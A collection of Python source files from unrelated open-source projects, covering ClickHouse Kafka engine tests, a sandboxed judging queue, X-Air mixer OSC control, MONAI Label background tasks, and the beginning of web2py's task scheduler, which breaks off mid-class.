SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
time.sleep(1)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
if __name__ == '__main__':
cluster.start()
raw_input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
judge.py | import enum
import threading
import subprocess
import shutil
import queue
import traceback
import os, os.path
class IsolatedJobEnvironment:
def __init__(self):
self._instructions = []
pass
def add_directory(self, host, virtual):
if not virtual.startswith("/"):
raise ValueError("Please use absolute virtual paths")
self._instructions.append((0, host, virtual))
def add_file(self, host, virtual):
if not virtual.startswith("/"):
raise ValueError("Please use absolute virtual paths")
self._instructions.append((1, host, virtual))
def add_exe_file(self, host, virtual):
if not virtual.startswith("/"):
raise ValueError("Please use absolute virtual paths")
self._instructions.append((2, host, virtual))
def _get_instructions(self):
return self._instructions
class JobResult(enum.Enum):
OK = 0
TL = 1
RE = 2
SG = 3
ML = 4
FL = 5
"""
FL is for system failure
Please note, that some systems may not support all verdicts (e.g. ML).
"""
def ok(self):
return self == JobResult.OK
def ok_or_re(self):
return self in [JobResult.OK, JobResult.RE]
def is_fail(self):
return self == JobResult.FL
class SimpleJobLimits:
def __init__(self):
self.timelimit = None
self.timelimit_wall = None
self.memorylimit = None
self.proclimit = 1
def set_timelimit(self, tm):
"""
Sets restriction to overall computation time
Parameters:
tm, time in milliseconds, as integer.
"""
self.timelimit = tm
def set_timelimit_wall(self, tm):
"""
Sets the real time limit on a job
Parameters:
tm, time in milliseconds, as integer.
"""
self.timelimit_wall = tm
def set_proclimit(self, proc):
"""
Sets the maximum number of simultaneous processes
Defaults to 1.
"""
self.proclimit = proc
def set_memorylimit(self, mem):
"""
Sets the max memory usage
Parameters:
mem: memory limit in kb's, as integer.
"""
self.memorylimit = mem
def get_timelimit(self):
return self.timelimit
def get_timelimit_wall(self):
return self.timelimit_wall
def get_proclimit(self):
return self.proclimit
def get_memorylimit(self):
return self.memorylimit
class IsolatedJob:
def __init__(self, judge, env, limits, *command, in_file=None, c_handler=None, c_args=None):
from time import time
self.__time = time()
self._judge = judge
self._env = env
self._limits = limits
self._command = list(command)
self._in_file = in_file
self._c_handler = c_handler
self._c_args = c_args
self._step = "pending"
self._result = None
self._timeusage = None
self._wallusage = None
self._memusage = None
self._failure_reason = None
self._lock = threading.Lock()
self._cv = threading.Condition(lock=self._lock)
self._workdir = None
self._quite = False
self._exitcode = None
self._exitsig = None
self._userdesc = None
def set_quite(self):
self.quite = True
def set_userdesc(self, desc):
self._userdesc = desc
def _init(self, box_id):
subprocess.check_call(["isolate", "--cleanup", "--cg", "--box-id={}".format(box_id)], timeout=10)
self._workdir = subprocess.check_output(["isolate", "--init", "--cg", "--box-id={}".format(box_id)], timeout=10, universal_newlines=True).strip() + "/box"
def _parse_result(self, isolate_meta):
def parse_time(value):
# Probably OK, but TODO
return int(1000 * float(value))
the_result = None
for line in isolate_meta.split("\n"):
if len(line) == 0:
continue
(key, value) = line.split(":", maxsplit=1)
if key == "status":
the_result = {"OK": JobResult.OK, "TO": JobResult.TL, "RE": JobResult.RE,
"SG": JobResult.RE, "XX": JobResult.FL}[value]
if key == "time":
self._timeusage = parse_time(value)
if key == "time-wall":
self._wallusage = parse_time(value)
if key == "cg-mem":
self._memusage = int(value)
if key == "exitcode":
self._exitcode = int(value)
if self._exitcode == 0:
the_result = JobResult.OK
if key == "exitsig":
self._exitsig = value
the_result = JobResult.SG
if the_result == None:
raise ValueError("Result not provided, responce was:\n" + isolate_meta)
return the_result
def _run(self, box_id):
isolate_head = ["isolate", "--run", "--meta=/dev/stdout", "-s", "--cg", "--cg-timing", "--box-id={}".format(box_id)]
isolate_mid = []
isolate_tail = ["--"] + self._command
isolate_head.append("--dir=/etc") # for g++ compilers through /etc/alternatives
if self._env:
for (tp, host, virtual) in self._env._get_instructions():
if tp == 0: # dir
isolate_mid.append("--dir={}={}".format(host, virtual))
elif tp == 1:
shutil.copyfile(host, os.path.join(self._workdir, virtual[1:]))
elif tp == 2:
shutil.copyfile(host, os.path.join(self._workdir, virtual[1:]))
os.chmod(os.path.join(self._workdir, virtual[1:]), 0o755)
if self._limits:
if self._limits.memorylimit:
isolate_head.append("--cg-mem={}".format(self._limits.memorylimit))
if self._limits.proclimit:
isolate_head.append("--processes={}".format(self._limits.proclimit))
TL = self._limits.timelimit
WTL = self._limits.timelimit_wall
def make_time(tm):
return "%d.%03d" % (tm // 1000, tm % 1000)
if TL:
isolate_head.append("--time={}".format(make_time(TL)))
if WTL:
isolate_head.append("--wall-time={}".format(make_time(WTL)))
isolate_head.append("--env=PATH=/usr/local/bin:/usr/bin/:/bin")
os.mkdir(os.path.join(self._workdir, "_files"))
for fl in ["stdin", "stdout", "stderr"]:
with open(os.path.join(self._workdir, "_files", fl), "w") as f:
pass
if self._in_file:
shutil.copyfile(self._in_file, os.path.join(self._workdir, "_files", "stdin"))
isolate_head.append( "--stdin={}".format("_files/stdin"))
isolate_head.append("--stdout={}".format("_files/stdout"))
isolate_head.append("--stderr={}".format("_files/stderr"))
cmd = isolate_head + isolate_mid + isolate_tail
if not self._quite:
if self._userdesc:
print("isolate-run box={} [{}]".format(box_id, self._userdesc))
else:
print("isolate-run box={}".format(box_id))
res = subprocess.run(cmd, stdout=subprocess.PIPE, universal_newlines=True)
if res.returncode not in [0, 1]:
raise Exception("Isolate returned bad exit code")
self._result = self._parse_result(res.stdout)
if self._result == JobResult.FL:
self._failure_reason = "Returned by checker"
with self._lock:
self._cv.notify_all()
def _clean(self, box_id):
if self._workdir:
try:
subprocess.call(["isolate", "--cleanup", "--cg", "--box-id={}".format(box_id)], timeout=1)
except Exception as ex:
print("warning: failed to cleanup: {}".format(ex))
def _just_fail(self):
self._failure_reason = "Aborted"
self._result = JobResult.FL
with self._lock:
self._cv.notify_all()
def _work(self, box_id):
self._box_id = box_id
try:
self._step = "init"
self._init(box_id)
self._step = "run"
self._run(box_id)
except Exception as ex:
self._failure_reason = "During {}\n{}\n{}".format(self._step, str(ex), traceback.format_exc())
self._result = JobResult.FL
with self._lock:
self._cv.notify_all()
if self._c_handler:
if self._c_args:
self._c_handler(*self._c_args)
else:
self._c_handler()
def get_timeusage(self):
self.wait()
return self._timeusage
def get_wallusage(self):
self.wait()
return self._wallusage
def get_memusage(self):
self.wait()
return self._memusage
def is_running(self):
return self._step == "run"
def is_ready(self):
with self._lock:
return self._result != None
def result(self):
self.wait()
return self._result
def time_used(self):
self.wait()
return self._timeusage
def wall_usage(self):
self.wait()
return self._wallusage
def exit_code(self):
self.wait()
return self._exitcode
def failure_reason(self):
self.wait()
return self._failure_reason
def wait(self):
if self._result != None:
return
with self._cv:
while self._result == None:
self._cv.wait()
def get_object_path(self, *path):
if not hasattr(self, "_box_id"):
raise Exception("EPIC FAIL")
return os.path.join(self._workdir, *path)
def get_stdout_path(self):
return self.get_object_path("_files", "stdout")
def get_stderr_path(self):
return self.get_object_path("_files", "stderr")
def release(self):
"""
Releases job and destroys all result
"""
if hasattr(self, "_box_id"):
self.wait()
self._clean(self._box_id)
self._judge._returnid(self._box_id)
delattr(self, "_box_id")
def __lt__(self, other):
return self.__time < other.__time
class IsolatedJudge:
def __init__(self):
self._num_threads = 4
self._queue = queue.PriorityQueue()
self._boxes = queue.Queue()
self._running = True
for i in range(2 * self._num_threads):
self._boxes.put(300 + i)
self._threads = []
for i in range(self._num_threads):
thread = threading.Thread(target = IsolatedJudge._work, args = (self,))
thread.start()
self._threads.append(thread)
def __enter__(self):
return self
def __exit__(self, *_):
print("shutting down judging system")
self._running = False
for i in range(self._num_threads):
self._queue.put((-1000, None))
for thr in self._threads:
thr.join()
while not self._queue.empty():
job = self._queue.get()[1]
if job != None:
job._just_fail()
def _work(self):
while True:
job = self._queue.get()[1]
if not self._running or job == None:
return
job._work(self._boxes.get())
def _returnid(self, box_id):
self._boxes.put(box_id)
def new_job(self, env, limits, *command, in_file=None, c_handler=None, c_args=None, priority=50, userdesc=None):
"""
Creates new runnable Job
Keyword Arguments:
env: use judge.new_env()
limits: use judge.new_limits()
in_file: path to the stdin.
c_handler: completion handler to call, optional.
c_args: args to path to completion handler
priority: the priority of the taks, lower is more important, should be in range [0; 99].
Other arguments:
Specify the command to run in a standard way
"""
job = IsolatedJob(self, env, limits, *command, in_file=in_file, c_handler=c_handler, c_args=c_args)
if userdesc:
job.set_userdesc(userdesc)
self._queue.put((priority, job))
return job
def new_env(self):
return IsolatedJobEnvironment()
def new_limits(self):
return SimpleJobLimits()
def new_job_helper(self, target):
import pmaker.jobhelper
if target == "compile.g++":
return pmaker.jobhelper.JobHelperCompilation(self)
if target == "compile.py3":
return pmaker.jobhelper.JobHelperPyCompilation(self)
if target == "invoke.g++" or target == "invoke.py3":
return pmaker.jobhelper.JobHelperInvokation(self)
if target == "invoke.bash":
return pmaker.jobhelper.JobHelperBashInvokation(self)
raise ValueError("Unsupported job helper type {}".format(target))
def new_judge():
return IsolatedJudge()
|
xair.py | "This modules managed communications with the XAir mixer"
# part of xair-remote.py
# Copyright (c) 2018, 2021 Peter Dikant
# Additions Copyright (c) 2021 Ross Dickson
# Some rights reserved. See LICENSE.
import time
import threading
import socket
import netifaces
from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_server import BlockingOSCUDPServer
from pythonosc.osc_message import OscMessage
from pythonosc.osc_message_builder import OscMessageBuilder
class OSCClientServer(BlockingOSCUDPServer):
"The OSC communications agent"
def __init__(self, address, dispatcher):
super().__init__(('', 0), dispatcher)
self.xr_address = address
def send_message(self, address, value):
"Packs a message for sending via OSC over UDB."
builder = OscMessageBuilder(address=address)
if value is None:
values = []
elif isinstance(value, list):
values = value
else:
values = [value]
for val in values:
builder.add_arg(val)
msg = builder.build()
self.socket.sendto(msg.dgram, self.xr_address)
class XAirClient:
"""
Handles the communication with the X-Air mixer via the OSC protocol
"""
_CONNECT_TIMEOUT = 0.5
_WAIT_TIME = 0.002
_REFRESH_TIMEOUT = 5
XAIR_PORT = 10024
info_response = []
def __init__(self, address, state):
self.state = state
dispatcher = Dispatcher()
dispatcher.set_default_handler(self.msg_handler)
self.server = OSCClientServer((address, self.XAIR_PORT), dispatcher)
worker = threading.Thread(target=self.run_server)
worker.daemon = True
worker.start()
def validate_connection(self):
"Confirm that the connection to the XAir is live, otherwise initiaties shutdown."
self.send('/xinfo')
time.sleep(self._CONNECT_TIMEOUT)
if len(self.info_response) > 0:
print('Successfully connected to %s with firmware %s at %s.' % (self.info_response[2],
self.info_response[3], self.info_response[0]))
else:
print('Error: Failed to setup OSC connection to mixer.',
'Please check for correct ip address.')
self.state.quit_called = True
if self.server is not None:
self.server.shutdown()
self.server = None
def run_server(self):
"Start the OSC communications agent in a seperate thread."
try:
self.server.serve_forever()
except KeyboardInterrupt:
self.quit()
def stop_server(self):
if self.server is not None:
self.server.shutdown()
self.server = None
def quit(self):
if self.state is not None:
self.state.shutdown()
else:
self.stop_server()
def msg_handler(self, addr, *data):
"Dispatch received OSC messages based on message type."
if self.state is None or self.state.quit_called:
self.stop_server()
return
#print 'OSCReceived("%s", %s, %s)' % (addr, tags, data)
if addr.endswith('/fader') or addr.endswith('/on') or addr.endswith('/level') or \
addr.startswith('/config/mute') or addr.endswith('/gain') or addr.startswith('/fx/'):
self.state.received_osc(addr, data[0])
elif addr == '/xinfo':
self.info_response = data[:]
elif addr.startswith('/meters'):
self.state.received_meters(addr, data)
elif addr.startswith('/-'):
pass
else: #if self.state.debug and addr.start:
print('OSCReceived("%s", %s)' % (addr, data))
def refresh_connection(self): # the main loop
"""
Tells mixer to send changes in state that have not been received from this OSC Client
/xremote - all parameter changes are broadcast to all active clients (Max 4)
/xremotefnb - No Feed Back. Parameter changes are only sent to the active clients
which didn't initiate the change
"""
if self.state.debug:
print("Refresh Connection %s" % self.state.levels)
try:
while not self.state.quit_called and self.server is not None:
self.server.send_message("/xremotenfb", None)
if self.state.levels or self.state.clip:
# using input levels, as these match the headamps when channels are remapped
time.sleep(self._REFRESH_TIMEOUT)
self.send(address="/meters", param=["/meters/2"])
if self.state.clip: # seems to crash if clipping protection runs for more than one cycle
if self.state.debug:
print("start auto level")
self.state.clip = False
# if self.state.screen_obj is not None:
# self.state.screen_obj.gpio_button[1].disable[0] = 1
time.sleep(self._REFRESH_TIMEOUT)
if self.state.quit_called:
self.quit()
return
except KeyboardInterrupt:
self.quit()
except socket.error:
self.quit()
def send(self, address, param=None):
"Call the OSC agent to send a message"
self.server.send_message(address, param)
def find_mixer():
"Search for the IP address of the XAir mixer"
print('Searching for mixer...')
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, True)
client.settimeout(5)
for iface in netifaces.interfaces():
try:
bcast = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['broadcast']
client.sendto("/xinfo\0\0".encode(), (bcast, XAirClient.XAIR_PORT))
except:
pass
try:
response = OscMessage(client.recv(512))
except socket.timeout:
print('No server found')
return None
client.close()
if response.address != '/xinfo':
print('Unknown response')
return None
else:
print('Found ' + response.params[2] + ' with firmware ' + response.params[3] + ' on IP ' + response.params[0])
return response.params[0]
|
async_tasks.py | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import json
import logging
import os
import os.path
import platform
import subprocess
import uuid
from collections import deque
from datetime import datetime
from threading import Thread
from typing import Dict
import psutil
from monailabel.config import settings
logger = logging.getLogger(__name__)
background_tasks: Dict = {}
background_processes: Dict = {}
def _task_func(task, method):
base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
script = "run_monailabel_app.bat" if any(platform.win32_ver()) else "run_monailabel_app.sh"
if os.path.exists(os.path.realpath(os.path.join(base_dir, "scripts", script))):
script = os.path.realpath(os.path.join(base_dir, "scripts", script))
cmd = [
script,
settings.APP_DIR,
settings.STUDIES,
method,
json.dumps(task["request"]),
]
logger.info(f"COMMAND:: {' '.join(cmd)}")
process = subprocess.Popen(
cmd,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
universal_newlines=True,
env=os.environ.copy(),
)
task_id = task["id"]
background_processes[method][task_id] = process
task["status"] = "RUNNING"
task["details"] = deque(maxlen=20)
plogger = logging.getLogger(f"task_{method}")
while process.poll() is None:
line = process.stdout.readline()
line = line.rstrip()
if line:
plogger.info(line)
task["details"].append(line)
logger.info("Return code: {}".format(process.returncode))
background_processes[method].pop(task_id, None)
process.stdout.close()
task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
if task["status"] == "RUNNING":
task["status"] = "DONE" if process.returncode == 0 else "ERROR"
def run_background_task(request, method, debug=False):
task = {
"id": uuid.uuid4(),
"status": "SUBMITTED",
"request": request,
"start_ts": datetime.today().strftime("%Y-%m-%d %H:%M:%S"),
}
if background_tasks.get(method) is None:
background_tasks[method] = []
if background_processes.get(method) is None:
background_processes[method] = dict()
background_tasks[method].append(task)
if debug:
_task_func(task, method)
else:
thread = Thread(target=functools.partial(_task_func, task, method))
thread.start()
return task
def stop_background_task(method):
logger.info(f"Kill background task for {method}")
if not background_tasks.get(method) or not background_processes.get(method):
return None
task_id, process = next(iter(background_processes[method].items()))
children = psutil.Process(pid=process.pid).children(recursive=True)
for child in children:
logger.info(f"Kill:: Child pid is {child.pid}")
child.kill()
logger.info(f"Kill:: Process pid is {process.pid}")
process.kill()
background_processes[method].pop(task_id, None)
logger.info(f"Killed background process: {process.pid}")
task = [task for task in background_tasks[method] if task["id"] == task_id][0]
task["status"] = "STOPPED"
task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
return task
def tasks(method):
"""
Returns List of all task ids
"""
return background_tasks.get(method, [])
def processes(method):
"""
Returns Dict of all task id => process
"""
return background_processes.get(method, dict())
def run_main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--app", required=True)
parser.add_argument("-s", "--studies", required=True)
parser.add_argument("-m", "--method", default="info")
parser.add_argument("-r", "--request", default="{}")
parser.add_argument("-d", "--debug", action="store_true")
args = parser.parse_args()
args.app = os.path.realpath(args.app)
args.studies = os.path.realpath(args.studies)
settings.APP_DIR = args.app
settings.STUDIES = args.studies
logging.basicConfig(
level=(logging.DEBUG if args.debug else logging.INFO),
format="[%(asctime)s] [%(levelname)s] (%(name)s.%(funcName)s:%(lineno)d) - %(message)",
datefmt="%Y-%m-%d %H:%M:%S",
)
run_background_task(json.loads(args.request), args.method, debug=True)
if __name__ == "__main__":
run_main()
|
scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
USAGE = """
## Example
For any existing app
Create File: app/models/scheduler.py ======
from gluon.scheduler import Scheduler
def demo1(*args,**vars):
print 'you passed args=%s and vars=%s' % (args, vars)
return 'done!'
def demo2():
1/0
scheduler = Scheduler(db,dict(demo1=demo1,demo2=demo2))
## run worker nodes with:
cd web2py
python web2py.py -K myapp
or
python gluon/scheduler.py -u sqlite://storage.sqlite \
-f applications/myapp/databases/ \
-t mytasks.py
(-h for info)
python scheduler.py -h
## schedule jobs using
http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task
## monitor scheduled jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id>0
## view completed jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id>0
## view workers
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id>0
## To install the scheduler as a permanent daemon on Linux (w/ Upstart), put
## the following into /etc/init/web2py-scheduler.conf:
## (This assumes your web2py instance is installed in <user>'s home directory,
## running as <user>, with app <myapp>, on network interface eth0.)
description "web2py task scheduler"
start on (local-filesystems and net-device-up IFACE=eth0)
stop on shutdown
respawn limit 8 60 # Give up if restart occurs 8 times in 60 seconds.
exec sudo -u <user> python /home/<user>/web2py/web2py.py -K <myapp>
respawn
## You can then start/stop/restart/check status of the daemon with:
sudo start web2py-scheduler
sudo stop web2py-scheduler
sudo restart web2py-scheduler
sudo status web2py-scheduler
"""
import os
import time
import multiprocessing
import sys
import threading
import traceback
import signal
import socket
import datetime
import logging
import optparse
import types
import Queue
if 'WEB2PY_PATH' in os.environ:
sys.path.append(os.environ['WEB2PY_PATH'])
else:
os.environ['WEB2PY_PATH'] = os.getcwd()
if not os.environ['WEB2PY_PATH'] in sys.path:
sys.path.append(os.environ['WEB2PY_PATH'])
try:
from gluon.contrib.simplejson import loads, dumps
except:
from simplejson import loads, dumps
logger = logging.getLogger('web2py.scheduler')
from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_INT_IN_RANGE, IS_DATETIME
from gluon.utils import web2py_uuid
QUEUED = 'QUEUED'
ASSIGNED = 'ASSIGNED'
RUNNING = 'RUNNING'
COMPLETED = 'COMPLETED'
FAILED = 'FAILED'
TIMEOUT = 'TIMEOUT'
STOPPED = 'STOPPED'
ACTIVE = 'ACTIVE'
TERMINATE = 'TERMINATE'
DISABLED = 'DISABLED'
KILL = 'KILL'
EXPIRED = 'EXPIRED'
SECONDS = 1
HEARTBEAT = 3 * SECONDS
MAXHIBERNATION = 10
CLEAROUT = '!clear!'
CALLABLETYPES = (types.LambdaType, types.FunctionType,
types.BuiltinFunctionType,
types.MethodType, types.BuiltinMethodType)
class Task(object):
def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs):
logger.debug(' new task allocated: %s.%s', app, function)
self.app = app
self.function = function
self.timeout = timeout
self.args = args # json
self.vars = vars # json
self.__dict__.update(kwargs)
def __str__(self):
return '<Task: %s>' % self.function
class TaskReport(object):
def __init__(self, status, result=None, output=None, tb=None):
logger.debug(' new task report: %s', status)
if tb:
logger.debug(' traceback: %s', tb)
else:
logger.debug(' result: %s', result)
self.status = status
self.result = result
self.output = output
self.tb = tb
def __str__(self):
return '<TaskReport: %s>' % self.status
def demo_function(*argv, **kwargs):
""" test function """
for i in range(argv[0]):
print 'click', i
time.sleep(1)
return 'done'
#the two functions below deal with simplejson decoding as unicode, esp for the dict decode
#and subsequent usage as function Keyword arguments unicode variable names won't work!
#borrowed from http://stackoverflow.com/questions/956867/how-to-get-string-objects-instead-unicode-ones-from-json-in-python
def _decode_list(lst):
newlist = []
for i in lst:
if isinstance(i, unicode):
i = i.encode('utf-8')
elif isinstance(i, list):
i = _decode_list(i)
newlist.append(i)
return newlist
def _decode_dict(dct):
newdict = {}
for k, v in dct.iteritems():
if isinstance(k, unicode):
k = k.encode('utf-8')
if isinstance(v, unicode):
v = v.encode('utf-8')
elif isinstance(v, list):
v = _decode_list(v)
newdict[k] = v
return newdict
def executor(queue, task, out):
""" the background process """
logger.debug(' task started')
class LogOutput(object):
"""Facility to log output at intervals"""
def __init__(self, out_queue):
self.out_queue = out_queue
self.stdout = sys.stdout
sys.stdout = self
def __del__(self):
sys.stdout = self.stdout
def flush(self):
pass
def write(self, data):
self.out_queue.put(data)
stdout = LogOutput(out)
try:
if task.app:
os.chdir(os.environ['WEB2PY_PATH'])
from gluon.shell import env, parse_path_info
from gluon import current
level = logging.getLogger().getEffectiveLevel()
logging.getLogger().setLevel(logging.WARN)
# Get controller-specific subdirectory if task.app is of
# form 'app/controller'
(a, c, f) = parse_path_info(task.app)
_env = env(a=a, c=c, import_models=True)
logging.getLogger().setLevel(level)
f = task.function
functions = current._scheduler.tasks
if not functions:
#look into env
_function = _env.get(f)
else:
_function = functions.get(f)
if not isinstance(_function, CALLABLETYPES):
raise NameError(
"name '%s' not found in scheduler's environment" % f)
globals().update(_env)
args = loads(task.args)
vars = loads(task.vars, object_hook=_decode_dict)
result = dumps(_function(*args, **vars))
else:
### for testing purpose only
result = eval(task.function)(
*loads(task.args, object_hook=_decode_dict),
**loads(task.vars, object_hook=_decode_dict))
queue.put(TaskReport(COMPLETED, result=result))
except BaseException, e:
tb = traceback.format_exc()
queue.put(TaskReport(FAILED, tb=tb))
del stdout
class MetaScheduler(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.process = None # the background process
self.have_heartbeat = True # set to False to kill
self.empty_runs = 0
def async(self, task):
"""
starts the background process and returns:
('ok',result,output)
('error',exception,None)
('timeout',None,None)
('terminated',None,None)
"""
db = self.db
sr = db.scheduler_run
out = multiprocessing.Queue()
queue = multiprocessing.Queue(maxsize=1)
p = multiprocessing.Process(target=executor, args=(queue, task, out))
self.process = p
logger.debug(' task starting')
p.start()
task_output = ""
tout = ""
try:
if task.sync_output > 0:
run_timeout = task.sync_output
else:
run_timeout = task.timeout
start = time.time()
while p.is_alive() and (
not task.timeout or time.time() - start < task.timeout):
if tout:
try:
logger.debug(' partial output saved')
db(sr.id == task.run_id).update(output=task_output)
db.commit()
except:
pass
p.join(timeout=run_timeout)
tout = ""
while not out.empty():
tout += out.get()
if tout:
logger.debug(' partial output: "%s"' % str(tout))
if CLEAROUT in tout:
task_output = tout[
tout.rfind(CLEAROUT) + len(CLEAROUT):]
else:
task_output += tout
except:
p.terminate()
p.join()
self.have_heartbeat = False
logger.debug(' task stopped by general exception')
tr = TaskReport(STOPPED)
else:
if p.is_alive():
p.terminate()
logger.debug(' task timeout')
try:
# we try to get a traceback here
tr = queue.get(timeout=2)
tr.status = TIMEOUT
tr.output = task_output
except Queue.Empty:
tr = TaskReport(TIMEOUT)
elif queue.empty():
self.have_heartbeat = False
logger.debug(' task stopped')
tr = TaskReport(STOPPED)
else:
logger.debug(' task completed or failed')
tr = queue.get()
tr.output = task_output
return tr
def die(self):
logger.info('die!')
self.have_heartbeat = False
self.terminate_process()
def give_up(self):
logger.info('Giving up as soon as possible!')
self.have_heartbeat = False
def terminate_process(self):
try:
self.process.terminate()
except:
pass # no process to terminate
def run(self):
""" the thread that sends heartbeat """
counter = 0
while self.have_heartbeat:
self.send_heartbeat(counter)
counter += 1
def start_heartbeats(self):
self.start()
def send_heartbeat(self, counter):
print 'thum'
time.sleep(1)
def pop_task(self):
return Task(
app=None,
function='demo_function',
timeout=7,
args='[2]',
vars='{}')
def report_task(self, task, task_report):
print 'reporting task'
pass
def sleep(self):
pass
def loop(self):
try:
self.start_heartbeats()
while True and self.have_heartbeat:
logger.debug('looping...')
task = self.pop_task()
if task:
self.empty_runs = 0
self.report_task(task, self.async(task))
else:
self.empty_runs += 1
logger.debug('sleeping...')
if self.max_empty_runs != 0:
logger.debug('empty runs %s/%s',
self.empty_runs, self.max_empty_runs)
if self.empty_runs >= self.max_empty_runs:
logger.info(
'empty runs limit reached, killing myself')
self.die()
self.sleep()
except KeyboardInterrupt:
self.die()
TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED)
RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED)
WORKER_STATUS = (ACTIVE, DISABLED, TERMINATE, KILL)
class TYPE(object):
"""
validator that check whether field is valid json and validate its type
"""
def __init__(self, myclass=list, parse=False):
self.myclass = myclass
self.parse = parse
def __call__(self, value):
from gluon import current
try:
obj = loads(value)
except:
return (value, current.T('invalid json'))
else:
if isinstance(obj, self.myclass):
if self.parse:
return (obj, None)
else:
return (value, None)
else:
return (value, current.T('Not of type: %s') % self.myclass)
class Scheduler(MetaScheduler):
def __init__(self, db, tasks=None, migrate=True,
worker_name=None, group_names=['main'], heartbeat=HEARTBEAT,
max_empty_runs=0, discard_results=False, utc_time=False):
MetaScheduler.__init__(self)
self.db = db
self.db_thread = None
self.tasks = tasks
self.group_names = group_names
self.heartbeat = heartbeat
self.worker_name = worker_name or socket.gethostname(
) + '#' + str(os.getpid())
#list containing status as recorded in the table plus a boost parameter
#for hibernation (i.e. when someone stop the worker acting on the worker table)
self.worker_status = [RUNNING, 1]
self.max_empty_runs = max_empty_runs
self.discard_results = discard_results
self.is_a_ticker = False
self.do_assign_tasks = False
self.greedy = False
self.utc_time = utc_time
from gluon import current
current._scheduler = self
self.define_tables(db, migrate=migrate)
def now(self):
